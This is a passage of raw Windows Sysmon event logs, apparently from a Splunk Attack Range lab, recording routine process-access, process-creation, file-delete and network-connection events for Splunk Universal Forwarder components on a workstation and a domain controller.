C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981583Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.294{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981582Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.294{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8E06-6151-237A-00000000FD01}820C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981581Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.294{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981580Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.294{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E06-6151-237A-00000000FD01}820C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981579Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.280{69CF5F33-8E06-6151-237A-00000000FD01}820C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001057101Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:25.145{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54266-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057100Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:27.408{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7EEC53F671066093FF398076E8F6AE9,SHA256=088F7C9297A5BBD20E1B6043FDD1509B435C3329654D1DCFE2D849D6E13F7103,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981622Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:27.857{69CF5F33-8E07-6151-257A-00000000FD01}33562292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981621Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:27.607{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E07-6151-257A-00000000FD01}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981620Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:27.607{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981619Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:27.607{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981618Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:27.607{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981617Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:27.607{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981616Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:27.607{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981615Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:27.607{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981614Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:27.607{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981613Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:27.607{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981612Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:27.607{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981611Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:27.607{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8E07-6151-257A-00000000FD01}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981610Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:27.607{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E07-6151-257A-00000000FD01}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981609Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:27.592{69CF5F33-8E07-6151-257A-00000000FD01}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981608Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:27.045{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF1610EECA6A63DDD5809FB6BA6FBF58,SHA256=4D0570D9C8DBA4271BFA2EFAB60B9E499A90A00D06CAFF0670E8D281388F71F7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057104Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:26.063{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53708-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057103Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:28.439{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32202863CD15FA3C782F2E4C388D53FB,SHA256=26EEA19EF2E359FD2AC330B3BDAD539546D2EDB6A4CB761BC6D86096B16C046C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981651Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.904{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E08-6151-277A-00000000FD01}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981650Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.904{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981649Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.904{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981648Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.904{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981647Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:28.904{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981646Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 